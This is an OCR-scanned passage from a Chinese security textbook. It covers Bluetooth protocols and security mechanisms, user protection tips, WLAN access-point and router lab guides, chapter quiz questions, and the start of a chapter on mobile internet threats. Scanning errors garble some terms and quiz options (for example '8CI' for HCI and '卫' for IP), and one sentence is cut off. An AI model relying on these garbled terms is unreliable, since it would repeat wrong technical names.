(2) 基带 / 链 路 控制 协议 (Baseband/LC ProtocoD): 定义 了 基带 部 分 协议 和 其 他 低层 链 路 
功能 ， 是 蓝牙 技术 的 核心 。 

(3) 链 路 管理 协议 (LMP): 用 于 链 路 的 建立 、 安 全 和 控制 ， 为 此 LMP 定义 了 许多 过 程 
来 完成 不 同 的 功能 。 

(4) 主机 控制 器 接口 (8CI: Host Controller Interface) 协 议 : 描述 了 主机 控制 接口 功能 上 
的 标准 ， 提 供 了 一 个 基带 控制 器 和 链 路 管理 器 (LM) 得 知 硬件 状态 和 控制 寄存 器 命令 的 接 
口 ， 在 蓝牙 中 起 着 中 间 层 的 作用 。 这 向 下 给 链 路 控制 器 协议 和 链 路 管理 协议 提供 接口 ， 并 
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提供 一 个 访问 蓝牙 基带 的 统一 方法 。HCI 是 硬件 和 软件 都 包含 的 部 分 。 

(5) 逻辑 链 路 控制 和 适 配 协 议 (L2CAP: Logical Link Control and Adaptation Protocol): 
支持 高 层 协议 复 用 、 帧 的 组 装 和 拆 分 、 传 送 QoS 信息 。L2CAP 提供 面向 连接 和 非 连接 两 种 
业务 ， 允 许 高 层 最 多 达 64kbit/s 的 数据 ， 以 一 种 有 限 状态 机 (ESM) 的 方式 来 进行 控制 ， 目 前 
只 支持 异步 无 连接 链 路 (ACL)。 

(6) 服务 发 现 协 议 (SDP: Service Discover Protocol): 如 何 发 现 蓝牙 设备 所 提供 服务 的 
协议 ， 使 高 层 应 用 能 够 得 知 可 提供 的 服务 。 在 两 个 蓝牙 设备 第 一 次 通信 时 ， 需 要 通过 SDP 
来 了 解 对 方 能 够 提供 何 种 服务 ， 并 将 自己 可 提供 的 服务 通知 对 方 。 

(7) 高 层 协议 : 包括 串口 通信 协议 RFCOMMJ)、 电 话 控制 协议 (TCS)、 对 象 交换 协议 
(OBEX)、 控制 命令 (AT-Command)、 电子 商务 标准 协议 (vCard 和 vCalender) 和 PPP, IP, TCP， 
UDP 等 相关 的 Intemet 协议 以 及 WAP 协议 。 其中， 串口 通信 协议 是 ETSI TS07.10 标准 的 
子 集 ， 并 且 加 入 了 蓝牙 特有 的 部 分 ， 电 话 控制 协议 使 用 了 一 个 以 比特 为 基础 的 协议 ， 定 义 
了 在 蓝牙 设备 之 间 建 立 语音 和 数据 呼叫 的 控制 信 令 , 对 象 交换 协议 提供 了 与 IDA 协议 系列 
相同 的 特性 ， 并 且 使 各 种 应 用 可 以 在 IDA 协议 栈 和 蓝牙 协议 栈 上 使 用 。 

两 个 蓝牙 设备 必须 具有 相同 的 协议 组 成 才能 够 相互 通信 。 例 如 要 在 蓝牙 实现 WAP 应 
用 ， 则 双方 都 必须 经 过 基带 协议 一 工 2CAP 一 RFCOMM 一 PPP 一 IP 一 UDP 一 WAP 的 路 径 
来 实现 。 


9.5.2 ”蓝牙 系统 安全 性 要 求 


由 于 蓝牙 系统 简单 可 靠 ， 从 而 产生 了 各 种 不 同 的 应 用 ， 例 如 计算 机 、 鼠 标 、 打 印 机 、 
接 入 单 击 、 移 动 电话 和 话 简 等 都 可 以 使 用 蓝牙 协议 无 线 地 连接 在 一 起 ， 进 行 语音 和 数据 的 
交换 。 同 时 ， 还 可 以 通过 无 线 或 有 线 的 接 入 点 (如 PSTN、ISDN、LAN、XDSL) 与 外 界 相连 。 
不 同 应 用 对 各 自 的 系统 必然 提出 不 同 的 要 求 , 并 且 不 是 所 有 的 系统 都 对 安全 性 有 很 高 的 

下 面 先 介绍 几 个 概念 。 

(1) 蓝牙 设备 地 址 BD_ADDR): 是 一 个 对 每 个 蓝牙 单元 唯一 的 48 位 IEEE 地 址 。 

(2) 个 人 确认 码 (PIN: Personal Identification NumbenD: 是 由 蓝牙 单元 提供 的 1 一 16 位 ( 八 
进 制 ) 数 字 ， 可 以 固定 或 者 由 用 户 选择 。 一 般 来 讲 ， 这 个 PIN 码 是 随 单元 一 起 提供 的 一 个 固 
定数 字 。 但 当 该 单元 有 人 机 接口 时 ， 用 户 可 以 任意 选择 PIN 的 值 ， 从 而 进入 通信 单元 。 蓝 
牙 基 带 标准 中 要 求 PIN 的 值 是 可 以 改变 的 。 

(3) 鉴 权 字 : 是 长 度 为 128 位 的 数字 ， 用 于 系统 的 鉴 权 。 

(4) 加 密 字 : 长 度 8 一 128 位 ， 可 以 改变 。 这 是 因为 不 同 的 国家 有 许多 不 同 的 对 加 密 算 
法 的 要 求 ， 同 时 也 是 各 种 不 同 应 用 的 需要 ， 还 有 利于 算法 和 加 密 硬件 系统 的 升级 。 

区 分 鉴 权 字 和 加 密 字 的 目的 是 在 不 降低 鉴 权 过 程 作用 的 前 提 下 使 用 更 短 的 加 密 字 。 

虽然 蓝牙 系统 的 跳 频 机 制 对 于 来 自 系统 内 部 其 他 设备 的 偶然 传输 干扰 起 到 了 一 定 的 保 
护 作 用 ， 但 是 很 显然 仅 有 这 种 保护 是 不 够 的 。 它 不 能 防止 有 人 在 两 个 传输 单元 之 间 对 数据 
的 窃听 和 偷 取 , 尤其 在 无 线 传输 数据 时 , 窃取 数据 者 可 以 轻松 地 屏蔽 自己 而 不 让 用 户 发 现 ， 
因此 蓝牙 系统 需要 加 入 相应 的 安全 机 制 。 在 一 般 的 系统 中 ， 通 常 对 所 传输 的 数据 包 进 行 加 
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密 , 但 仅 有 这 种 做 法 是 不 够 的 。 更 重要 的 是 在 通信 连接 建立 以 前 , 确保 通信 单元 的 安全 性 。 
例如 用 户 想 同时 跟 几 个 用 户 通信 ， 就 需要 对 这 些 用 户 进行 确认 。 因 此 ， 在 蓝牙 系统 中 运用 
了 鉴 权 和 加 密 技 术 。 


9.5.3 ”蓝牙 安全 机 制 


1. 字 管 理 机 制 


蓝牙 链 字 是 长 度 为 128 位 的 随机 数 ， 它 是 蓝牙 系统 鉴 权 和 加 密 的 基础 。 为 了 支持 不 同 
阶段 、 模 式 的 要 求 ， 蓝 牙 系 统 在 链 路 层 上 用 了 4 种 不 同 的 字 来 保证 系统 的 安全 性 ， 包 括 单 
元 字 KA、 组 合 字 KAB、 临 时 字 Kmaster 及 初始 化 字 Kinit。 

单元 字 KA 与 组 合 字 KAB 仅 产 生 方 式 不 同 ， 执 行 的 功能 是 完全 相同 的 。 也 就 是 说 ， 
KAB 是 由 两 个 单元 A、B 共同 产生 的 ， 而 KA 仅 由 一 个 单元 A 产生， 因此 KA 在 初始 化 阶 
段 产生 后 就 基本 不 变 了 。 系 统 的 内 存 比较 小 时 通常 选择 KA， 而 系统 对 稳定 性 要 求 比较 高 
时 选择 KAB。 

临时 字 Kmaster 只 是 临时 取代 原始 字 。 例 如 ， 当 主机 想 与 多 个 子 机 通信 时 ， 主 机 将 用 
同一 个 加 密 字 ， 因 此 把 它 存 放 在 临时 字 中 ， 以 便于 使 用 。 

初始 化 字 Kinit 仅仅 在 初始 化 阶段 有 效 , 也 是 单元 字 KA、KAB 产生 的 阶段 ， 它 不 仅仅 
是 初始 化 阶段 的 一 个 临时 字 ， 其 产生 需要 一 个 PIN。 

半 永 久 性 的 链接 字 在 特定 的 时 间 内 被 称 作 当前 链接 字 。 当前 链接 字 和 其 他 链接 字 一 样 ， 
用 于 鉴 权 和 加 密 过 程 。 此 外 ， 还 用 到 了 加 密 字 KC， 加 密 字 被 LM 的 命令 激活 后 将 自动 被 
改变 。 

另外 ， 鉴 权 字 和 加 密 字 在 不 同 的 阶段 执行 不 同 的 功能 。 例 如 : 在 两 个 单元 没有 建立 连 
接 的 阶段 和 已 经 建立 连接 的 阶段 有 很 大 的 不 同 ， 前 者 必须 首先 产生 加 密 字 ， 而 后 者 可 以 继 
续 使 用 上 次 通信 的 加 密 字 ， 相 应 地 ， 不 同 的 阶段 对 字 的 管理 是 不 一 样 的 。 此 外 当主 机 想 广 
播 消息 ， 而 不 是 一 个 一 个 地 传送 消息 时 ， 需 要 特殊 的 字 管 理 方法 。 正 是 蓝牙 系统 有 力 的 字 
管理 机 制 ， 才 使 得 系统 具有 很 好 的 安全 性 ， 而 且 支 持 不 同 的 应 用 模式 。 

2. 链接 字 的 产生 


初始 化 字 Kunit 的 值 以 申请 者 的 蓝牙 设备 地 址 、 一 个 PIN 码 、PIN 码 的 长 度 和 一 个 随 
机 数 作 为 参数 ， 通 过 E22 算法 产生 。 而 申请 者 相对 校 验 者 而 言 是 需要 通过 验证 的 一 方 。 因 
此 ， 申 请 者 需要 正确 的 PIN 码 和 PIN 码 的 长 度 。 一 般 来 讲 ， 由 HCI 决定 谁 是 申请 者 ， 谁 是 
校 验 者 。 

当 PIN 的 长 度 少 于 16 个 八进制 数 时 , 可 以 通过 填充 蓝牙 设备 地 址 的 数据 使 其 增 大 , 因 
此 如 果 循 环 使 用 E22 可 以 使 链接 字 的 长 度 增长 为 128 位 。 

初始 化 链接 字 Kint 产生 后 , 该 单元 将 产生 一 个 半 永 久 字 KA 或 KAB。 如果 产生 的 是 一 
个 KAB, 则 该 单元 将 用 一 个 随机 数 LK_RAND 周期 性 地 加 密 蓝 牙 设备 地 址 ， 加密 后 的 结果 
为 LK_KA， 而 各 自 产 生 的 LK_RAND 与 当前 的 链接 字 进 行 异 或 运算 后 ， 分 别 产生 新 值 ， 
水 为 CA 和 CA, 然后 互相 交换 ， 从 而 得 到 了 对 方 的 LK_RAND, 并 以 对 方 的 LK_ RAND 和 
蓝牙 设备 地 址 作为 参数 ， 用 E21 函数 产生 新 值 LK_KB 的 异 或 运算 得 到 组 合 字 KAB。 当 
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KAB 产生 后 ， 首 先 单 向 鉴 权 一 次 ,看 KAB 变 为 当前 链接 字 ， 而 丢弃 原先 的 链接 字 K。E22 
的 工作 原理 与 E21 类 似 。 


3. 蓝牙 单元 鉴 权 


在 鉴 权 过 程 中 ，LM 决定 谁 是 校 验 者 ， 谁 是 申请 者 。 申 请 者 和 校 验 者 必须 同时 拥有 一 
个 共同 的 当前 链接 字 。 而 这 种 口令 应 答 方式 的 鉴 权 实际 上 是 申请 者 发 送 一 个 随机 数 RAND， 
随后 校 验 者 用 当前 密 钥 字 、 申 请 者 的 蓝牙 设备 地 址 和 RAND 作为 加 密 算法 的 参数 得 到 新 值 ， 
记 为 SRES'。 申 请 者 以 同样 的 参数 、 算 法 得 到 的 新 值 记 为 SRES。 然 后， 申请 者 将 SRES 传 
送 给 校 验 者 ， 比 较 SRES' 和 SRES 是 否 相等 。 如 果 相 等 ， 则 鉴 权 通过 ， 否 则 鉴 权 失败 。 在 
间隔 一 定时 间 后 系统 重新 鉴 权 ， 鉴 权 机 制 的 安全 性 是 相当 高 的 。 更 保险 的 做 法 是 采用 双向 
鉴 权 ， 即 一 次 鉴 权 成 功 后 ， 调 整 申请 者 和 校 验 者 的 角色 ， 再 次 鉴 权 。 鉴 权 成 功 以 后 ， 产 生 
了 鉴 权 编码 补偿 (ACO)， 以 用 于 加 密 字 的 产生 。 


4. 加 密 


为 了 保证 蓝牙 系统 的 安全 性 ， 必 须 采 用 加 密 技术 。 但 蓝牙 系统 对 数据 包头 和 控制 字段 
并 不 加 密 。 蓝 牙 系统 通过 一 个 同步 的 流 加 密 算法 对 每 一 个 负载 加 密 ， 由 LM 最 终 决 定 是 否 
加 密 。 

最 后 需要 注意 的 是 ， 不 仅 要 对 数据 包 加 密 ， 而 且 要 对 加 密 过 程 的 中 间 数 据 进行 加 密 ， 
例如 对 鉴 权 编码 补偿 进行 加 密 ， 这 样 才能 防止 系统 被 攻击 和 数据 被 窃取 。 


9.5.4 ”如何 保护 蓝牙 


蓝牙 系统 提供 了 几 种 内 在 的 安全 机 制 ， 从 而 在 一 个 比较 广泛 的 范围 内 保证 了 蓝牙 系统 
的 安全 性 。 在 使 用 蓝牙 技术 的 过 程 中 ， 可 以 采用 以 下 几 个 措施 来 保证 其 安全 。 


1. 不 使 用 就 不 启用 


如 果 希 望 保护 蓝牙 的 安全 ， 一 个 首要 的 原则 是 在 不 需要 使 用 蓝牙 的 时 候 将 其 关闭 。 对 
于 移动 电话 来 说 可 以 在 蓝牙 设置 页 面 中 将 蓝牙 关闭 ， 而 对 于 计算 机 上 的 蓝牙 适配器 ， 可 以 
通过 附带 的 工具 软件 或 操作 系统 本 身 的 蓝牙 软件 将 其 设置 为 不 可 连接 状态 。 

2. 使 用 安全 设置 

在 蓝牙 规范 中 定义 了 三 种 安全 模式 : 没有 任何 保护 的 无 安全 模式 、 通 过 验证 码 保护 的 
服务 级 安全 、 可 以 应 用 加 密 的 设备 级 安全 。 在 适用 的 情况 下 尽 可 能 应 用 较 高 的 安全 模式 。 
对 便利 性 要 求 不 是 特别 高 的 环境 ， 不 要 将 蓝牙 设置 为 可 见 状态 ， 这 通常 不 会 对 验证 受到 信 
任 的 设备 造成 麻烦 。 

3. 选择 强壮 的 PIN 码 

正常 的 蓝牙 设备 连接 会 使 用 PIN 码 进行 验证 ， 相 当 于 计算 机 的 访问 密码 。 通 常 在 设备 
出 厂 时 这 个 PIN 码 不 会 被 设置 或 者 被 设置 为 一 个 特定 的 四 位 数字 ， 这 样 的 PIN 码 设置 仍然 
很 容易 受到 攻击 。 目 前 , 每 一 百 部 蓝牙 手机 中 会 有 接近 百 分 之 十 到 百 分 之 二 十 使 用 1111 或 
1234 这 样 简单 的 密码 ， 设 置 一 个 尽量 复杂 的 PIN 码 非 常 重要 。 
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4. 保持 对 安全 更 新 的 跟踪 

通常 存在 安全 漏洞 的 手机 都 可 以 通过 厂商 提供 的 更 新 进行 解决 ， 所 以 应 该 了 解 自己 的 
设备 是 否 有 安全 漏洞 ， 并 及 时 从 厂商 处 获取 更 新 。 另 外 更 多 地 了 解 蓝 牙 安全 方面 的 知识 ， 
并 应 用 一 些 免费 的 蓝牙 安全 工具 ， 也 可 以 有 效 地 减少 受 攻击 的 可 能 。 


5. 足够 的 警惕 性 

恶意 攻击 并 不 总 是 隐秘 进行 的 ， 在 攻击 过 程 中 蓝牙 连接 的 状态 图 标 可 能 会 发 生变 化 ， 
设备 可 能 会 产生 某 些 声音 ， 还 可 能 会 出 现 可 疑 的 配对 请 求 。 蓝 牙 用 户 有 责任 对 安全 问题 保 
持 足够 的 警惕 ， 而 且 这 样 才 能 阻止 各 种 社交 工程 行为 。 


小 结 


本 章 主 要 介绍 了 无 线 局 域 网 安全 的 相关 知识 ， 通 过 本 章 的 学 习 ， 学 生 可 掌握 无 线 局 域 
网 相关 技术 、 无 线 局 域 网 面 对 的 安全 问题 和 解决 方案 ， 包 括 WEP 机 制 、VPN 技术 以 及 蓝 
牙 技术 。 


本 章 实 训 
实 训 一 ”无 线 局 域 网 组 网 实验 指导 


1. 实验 目的 


了 解 无 线 网 络 的 概念 ， 学 习 无 线 组 网 的 方法 。 
掌握 无 线 网 络 接 入 点 WAP54G 的 安装 过 程 。 

掌握 安全 配置 无 线 网 络 接 入 点 WAP54G 的 方法 。 

掌握 Wireless-G USB 无 线 网 络 适配器 的 安装 及 安全 配置 方法 。 


2. 实验 内 容 


(1) 无 线 网 络 接 入 点 WAP54G 的 安装 。 
(2) 安全 配置 无 线 网 络 接 入 点 WAP54G。 
(3) Wireless-G USB 无 线 网 络 适配器 的 安装 及 安全 配置 。 


3. 实验 步骤 


1) “实验 设备 的 选择 

本 实验 需要 的 设备 如 下 。 

WAP54G 无 线 接 入 点 一 台 、Wireless-G USB 无 线 网 络 适配器 三 个 、STAR-1926F+ 交 
换 机 一 台 、 客 户 机 三 台 。 

2) WAP54G 无 线 接 入 点 的 连接 

(1) 给 接 入 点 找 一 个 最 佳 的 位 置 : 接 入 点 的 最 佳 位 置 一 般 位 于 无 线 网 络 的 中 心 ， 视 线 
可 以 到 达 所 有 移动 站 。 

(2) 确定 天 线 的 方向 : 天 线 的 位 置 应 当 能 够 覆盖 无 线 网 络 。 一 般 情 况 下 ， 天 线 越 高 ， 
它 的 性 能 就 越 好 。 和 天线 的 位 置 对 接收 灵敏 度 的 影响 比较 大 。 


@ 
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(3) 局 域 网 端口 是 和 以 太 网 装置 相连 的 ， 如 : 集线器 、 开 关 或 路 由 器 。 

(4) 交流 电源 适配器 的 一 端 应 当 与 接 入 点 的 电源 端口 相连 ， 另 一 端 与 电源 相连 。 

3) WAP54G 无 线 接 入 点 的 配置 

(1) 启动 安装 光盘 的 安装 程序 ， 进 入 安装 向 导 。 

(2) 选择 一 个 无 线 接 入 点 ， 对 接 入 点 进行 下 列 配置 。 

(3) 设置 配置 密码 。 

(4) 设置 接 入 点 名 称 、IP 地 址 和 子 网 掩 码 。 

(5) 设置 无 线 网 络 的 SSID， 选 择 与 你 的 网 络 设 定 值 相对 应 的 信道 (无 线 网 络 中 所 有 的 


点 都 必须 使 用 相同 的 信道 )。 


(6) 进行 保密 值 设 定 ， 并 保存 设置 结果 。 
4) ”Wireless-G USB 无 线 网 络 适配器 的 连接 
无 线 网 络 适配器 通过 它 的 USB 端口 与 计算 机 连接 起 来 ， 它 所 需要 的 电力 由 USB 连接 


器 提供 ， 故 不 需要 专门 的 电源 适配器 。 


5) ”Wireless-G USB 无 线 网 络 适配器 的 配置 

(1) 启动 安装 光盘 的 安装 程序 ， 进 入 安装 向 导 。 

(2) 输入 无 线 网 络 的 SSID， 选 择 一 种 无 线 模式 ， 再 根据 提示 操作 。 
(3) 将 无 线 网 络 适配器 与 计算 机 相连 ， 安 装 适配器 驱动 软件 。 

(4) 使 用 WLAN 监视 器 检查 连接 信息 。 


实 训 二 无 线路 由 器 安全 设置 实验 指导 


1. 实验 目的 

了 解 无 线路 由 器 的 功能 及 一 般 设置 方法 。 
掌握 WEP 的 工作 原理 及 安全 机 制 。 

掌握 安全 配置 无 线路 由 器 方法 。 

掌握 一 般 无 线 网 络 适配器 安全 配置 。 

2. 实验 内 容 

(1) 无 线路 由 器 的 WEP 加 密 启用 。 

(2) 无 线路 由 器 其 他 安全 设置 。 

(3) 无 线 适 配器 的 安全 设置 。 

3. 实验 步骤 

(1) 实验 设备 的 选择 。 

本 实验 需要 的 设备 包括 : TL-WR641G 无 线路 由 器 一 台 、TL-WN620G 无 线 网 络 适 配器 


三 个 、STAR-1926F+ 交 换 机 一 台 、 客 户 机 三 台 。 


(2) 无 线路 由 器 的 WEP 加 密 启用 。 

有 具体 步骤 见 9.3.2 节 内 容 无 线路 由 器 配置 。 
(3) 无 线 适配器 的 安全 设置 。 

具体 步骤 见 9.3.2 节 内 容 无 线 适配器 配置 。 
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本 章 习 题 
一 、 选 择 题 
1. 为 实现 无 线 局 域 网 的 接 入 控制 ， 采 用 ( ”) 来 认证 用 户 。 
A. IEEE B. SSID C. WEP D. MAC 


2. 攻击 者 恶意 占用 主机 或 网 络 几乎 所 有 的 资源 ， 使 得 合法 用 户 无 法 获得 这 些 资源 ， 
这 种 攻击 方式 称 为 ( )。 


A. 渗透 B. 窃听 C. 拒绝 服务 攻击 D. 解密 
3. 无 线 网 络 接 入 点 称 为 (。 )。 

A. 无 线 AP B. 无 线路 由 器 C. 无 线 上 网 卡 D. WEP 
4. ”NetStumbler 软件 的 功能 是 ( 。 )。 

A. 加 密 无 线 信道 B. 提供 WEP 机 制 

C. 组 建 VPN D. 搜索 无 线 网 络 
5. 蓝牙 设备 的 标志 地 址 是 (  )。 

A.SSID B.IP 地 址 

C. 个 人 确认 码 D.IEEE 地 址 


6.、 下面 关于 TCP/IP 说 法 错误 的 是 (  )。 
A. 它 是 一 种 双 层 程序 
B. TCP 协议 在 会 话 层 工作 
C. 卫 控制 信息 包 从 源头 到 目的 地 的 传输 路 径 
D. 卫 协议 属于 网 络 层 
7. VPN 的 核心 功能 是 ( 。 )。 


A. 安全 服务 B. 网 站 管理 C. 数据 分 析 D. 响应 请 求 

8. 在 VPN 中 ， 如 何在 公用 数据 网 上 安全 地 传递 密 钥 而 不 被 窃取 ， 可 以 采用 (  )。 
A. 身份 认证 技术 B. 隧道 技术 
C. 密 钥 管理 技术 D. 加 密 技术 

二 、 填 空 题 

1. 无 线 网 络 设备 主要 有 .和  . 

2. 无 线 上 网 卡 主要 有 和 两 种 。 

3. IEEE 802. 11b 标准 定义 了 和 两 种 方法 实现 无 线 局 域 网 的 接 入 

控制 和 加 密 。 
4. 无 线 网 卡 有 三 种 标准 。 
无 线 网 络 的 规格 标准 主要 有 、 四 种 。 


6. 虚拟 专用 网 络 主要 采用 四 种 技术 来 保证 网 络 安全 ， 它们 是 、 
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三 、 简 答题 

无 线 网 络 的 设备 有 哪些 ? 

WEP 机 制 的 作用 。 

什么 是 VPN? 如 何 对 VPN 进行 分 类 ? 
简 述 无 线 网 络 安 全 威胁 防范 。 

无 线 VPN 主要 特点 有 哪些 ? 


Dr 
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第 10 章 移动 互联 网 安全 


【本 章 要 点 】 
通过 本 章 的 学 习 ， 让 读者 了 解 当前 移动 互联 网 发 展 的 状态 及 发 展 趋势 ， 同 时 详细 介绍 
移动 互联 网 面临 的 安全 威胁 ， 以 及 防范 措施 等 相关 知识 。 


10.1 ”移动 互联 网 概况 


随 着 智能 手机 、 智 能 终端 、Pad 类 终端 等 的 快速 普及 ， 移 动 互联 网 快速 崛起 ， 智 能 手 
机 操作 系统 漏洞 、 移 动 远 程 办 公 的 身份 认证 和 数据 传输 安全 问题 、 网 上 交易 和 钓鱼 网 站 泛 
滥 等 问题 愈 发 严重 ， 移 动 安全 漏洞 的 数量 迅速 增加 ， 新 的 漏洞 和 更 复杂 的 黑客 技术 最 终 会 
对 新 兴 移 动 网 络 技术 形成 威胁 , 信息 安全 产品 必须 进行 持续 创新 才能 应 对 新 问题 、 新 威胁 。 


10.1.1 移动 互联 网 概述 


1. 移动 互联 网 的 概念 


移动 互联 网 (Mobile Intemet，MD 是 基于 移动 通信 技术 ， 广 域 网 、 局 域 网 及 各 种 移动 信 
息 终端 按照 一 定 的 通信 协议 组 成 的 互联 网 络 。 是 一 种 通过 智能 移动 终端 ， 采 用 移动 无 线 通 
信 方 式 获取 业务 和 服务 的 新 兴业 态 ， 包 含 终端 ”软件 和 应 用 三 个 层面 。 终 端 层 包 括 智能 手 
机 、 平 板 电 脑 、 电 子 书 、MID 等 ， 软 件 包 括 操作 系统 、 中 间 件 、 数 据 库 和 安全 软件 等 。 应 
用 层 包括 休闲 娱乐 类 、 工 具 媒体 类 、 商 务 财经 类 等 不 同 应 用 与 服务 。 随 着 技术 和 产业 的 发 
展 , 未 来 , LTE( 长 期 演进 ，4G 通信 技术 标准 之 一 ) 和 NFC( 近 场 通信 , 移动 支付 的 支撑 技术 ) 
等 网 络 传输 层 关键 技术 也 将 被 纳入 移动 互联 网 的 范畴 之 内 。 移动 互联 网 的 基本 组 成 如 图 
10-1 所 示 。 


用 户 群体 。 终端 类 型 富 带 接 入 汇票 及 | 
et 核心 承载 


局 全 


平台 业务 及 应 用 


图 10-1 移动 互联 网 基本 组 成 
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2. 移动 互联 网 的 发 展现 状 


国际 电 联 GTU) 在 2013 年 10 月 8 日 发 布 的 最 新 年 报 称 ， 移 动 市 场 将 在 2013 年 获得 巨 
大 的 发 展 ， 预 计 到 2013 年 年 底 的 时 候 ， 全 球 移 动 联网 设备 数 将 达到 68 亿 台 ， 几 乎 等 于 地 
球 上 的 人 口 总 和 。 并 且 有 些 网 民 拥 有 不 止 一 部 手机 ， 总 的 移动 渗透 率 大 概 为 每 百 家 住 户 /家 
庭 有 96.2 名 用 户 。 换 名 话说， 移动 运营 商 们 现在 正在 接近 固 线 电话 服务 多 年 来 从 未 企及 的 
目标 。Facebook 和 谷歌 ( 微 博 ) 等 公司 正在 全 球 尤 其 是 移动 平台 上 拓展 它们 的 业务 ，ITU 提 
供 的 一 些 数据 证 明 它 们 的 做 法 是 正确 的 ， 似 乎 大 多 数 用 户 都 是 移动 用 户 。 虽 然 ITU 没有 说 
明 使 用 智能 手机 上 网 的 用 户 数量 具体 是 多 少 ， 但 它 指出 宽带 渗透 率 正 在 逐步 增长 ， 现 在 每 
百 户 家 庭 约 有 41.3 名 用 户 正 在 使 用 某 种 形式 的 上 网 服务 。 每 百 户 家 庭 中 ， 固 线 宽带 用 户 约 
为 9.8 名 ， 而 移动 宽带 用 户 约 为 29.5 名 。 换 名 话说， 如果 你 想 将 你 的 服务 提供 给 网 民 ， 你 
最 好 在 移动 平台 上 推广 它 。 

我 国 移动 互联 网 用 户 也 呈 爆 发 式 增长 态势 ， 根 据 工信部 公布 数据 显示 ，2013 年 一 季度 
我 国 移动 互联 网 接 入 月 户 均 流量 首次 突破 100M， 达 到 117.4M， 同 比 增长 30.4%。 其 中 手 
机 上 网 是 主要 拉动 因素 ， 在 移动 互联 网 接 入 流量 的 比重 达到 62.3%。3G 网 络 的 移动 互联 网 
接 入 流量 占 比 已 达 50%。 移 动 互联 网 用 户 单 季 净 增 创 近 两 年 新 高 ， 手 机 上 网 用 户 总 量 占 比 
达 96.4%。 一 季度 ,移动 互联 网 用 户 净 增 5 302.8 万 户 ， 达 8.17 亿 户 ， 移 动 电话 用 户 中 的 渗 
透 率 达到 71.3%。 其 中 ， 手 机 上 网 用 户 继续 保持 高 速 发 展 态势 ， 净 增 3 905.8 万 户 ， 总 数 达 
到 7.88 亿 户 ， 占 移动 互联 网 用 户 比重 达到 96.4%。 无 线 上 网 卡 用户 增 速 继续 放 缓 ， 净 增 仅 
10.4 万 户 ， 同 比 增长 0.7%， 预 计 无 线 上 网 卡 逐 步 会 被 手机 上 网 用 户 蔡 代 ， 即 将 进入 下 
行 通道 。 

3. 移动 互联 网 发 展 特征 


移动 互联 网 出 现 至 今 ， 其 演进 过 程 总 共 经 历 了 三 个 阶段 : 从 最 初 的 模拟 无 线 通信 到 
GSM 无 线 通信 再 到 3G 无 线 通信 ， 今 天 ， 我 们 已 经 进入 3G 移动 互联 网 时 代 。 而 移动 互联 
网 在 演进 过 程 中 伴随 如 下 特征 。 

(1) 网 络 “ALL-IP”。 

在 2008 年 10 月 中 国 (北京 ) 国 际 信息 通信 展 上 ， 华 为 、 中 兴 通 讯 、 爱 立信 、 上 海 贝 尔 
和 诺基亚 西门 子 通信 无 一 例外 地 展示 了 ALL-IP 网 络 解决 方案 。 移动 互联 网 从 最 初 2G 网 络 
的 核心 网 卫 化 ， 到 今天 3G 接 入 网 、 核 心 网 以 及 内 容 网 络 的 端 到 端 瑟 化 过 程 中 ， 都 在 试图 
成 立 移动 互联 网 的 ALL-IP 标准 ， 移 动 互 联网 全 部 人 P 化 是 最 终 的 目标 。 

移动 互联 网 卫 化 后 ， 出 现 了 很 多 优点 ， 它 提高 了 业务 的 丰富 性 、 组 网 灵活 性 、 系 统 的 
高 扩展 性 以 及 业务 和 网 络 的 可 管理 性 等 , 但 是 他 化 也 带 来 一 个 很 大 的 问题 ， 就 是 它 把 基于 
IP 的 互联 网 存在 的 安全 威胁 ， 全 部 引入 到 了 移动 互联 网 中 来 。 比 如 从 前 只 在 固 网 出 现 的 
DDoS 攻击 、 蠕 虫 病毒 、 恶 意 网 页 推送 等 ， 如 今 在 我 们 的 移动 互联 网 中 也 屡见不鲜 。 

(2) 终端 “智能 化 ”。 

单 从 手机 看 ， 无 论 是 引领 时 尚 潮流 的 “ 洋 品 牌 ”iPhone、 黑 霉 ， 还 是 攻 城 掠 地 集 万 千 
功能 于 一 身 的 “国产 货 ” 山 寨 机 ， 提 供 的 功能 真 可 谓 “ 应 有 尽 有 ”。 之前， 我 们 只 能 在 计 
算 机 上 完成 的 功能 ， 现 在 智能 终端 几乎 都 可 以 完成 了 。 移 动 终端 在 实现 智能 化 以 后 ， 会 
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现 与 我 们 的 计算 机 终端 一 样 的 安全 威胁 。 针 对 无 线 终端 的 攻击 除了 传统 的 攻击 手段 之 外 ， 
也 有 其 自身 的 特殊 性 。 如 针对 手机 操作 系统 的 病毒 攻击 ， 针 对 无 线 业务 的 木马 攻击 、 恶 意 
广播 的 垃圾 电话 、 基 于 彩信 应 用 的 蠕虫 病毒 、 手 机 信息 盗用 等 。 

同时 ， 在 智能 终端 冲击 下 ， 业 务 的 管道 化 问题 也 需要 特别 重视 。 当 手机 智能 化 之 后 ， 
在 线 视频 点 播 、P2P 下 载 等 数据 业务 会 像 在 固 网 中 一 样 迅速 膨胀 ， 如 果 在 移动 互联 网 中 提 
供 数据 管道 ， 那 好 比 一 个 高 速 公 路 一 样 ， 它 不 管 进出 的 车 辆 是 小 车 还 是 卡车 ， 它 只 管 按 车 
的 数量 收费 ， 而 不 是 按 车 的 大 小 收费 。 

G3) 带宽 趋 “ 百 兆 ”。 

3G 标准 规定 提供 超过 1M 的 接 入 带宽 ， 未 来 可 以 提供 几 十 兆 甚至 百 兆 的 接 入 带宽 。 如 
此 一 来 ， 首 先是 会 对 移动 互联 网 上 现存 的 安全 设备 性 能 提出 挑战 。 第 二 点 ， 伴 随 着 接 入 带 
宽 的 提高 ， 用 户 会 把 无 线 上 网 卡 插 到 计算 机 上 去 ， 体 验 无 线 网 络 的 便捷 ， 这 样 会 把 计算 机 
的 安全 威胁 引入 到 无 线 网 络 中 ， 一 旦 终端 受到 了 安全 威胁 ， 比 如 成 为 僵尸 主机 ， 那 无 线 网 
络 受到 的 攻击 跟 固 网 是 一 样 的。 同时 ， 无 线 资源 对 用 户 数 是 有 限制 的 ， 并 且 数据 用 户 的 多 
少 会 影响 语音 业务 的 体验 。 如 果 恶 意 用 户 频繁 地 去 攻击 别人 ， 或 者 是 用 一 些 垃圾 流量 去 访 
问 别人 ， 则 会 极 大 地 占用 无 线 资源 。 另 外 产生 的 一 个 问题 就 是 计 费 问题 ， 恶 意 的 攻击 流量 
和 垃圾 流量 也 会 导致 用 户 的 计 费 信息 增加 ， 导 致 了 用 户 费用 提升 和 满意 度 下 降 。 

总 之 ， 移 动 互联 网 的 发 展 带 来 的 安全 问题 很 多 : 移动 互联 网 的 ALL-IP 化 引入 了 IP 互 
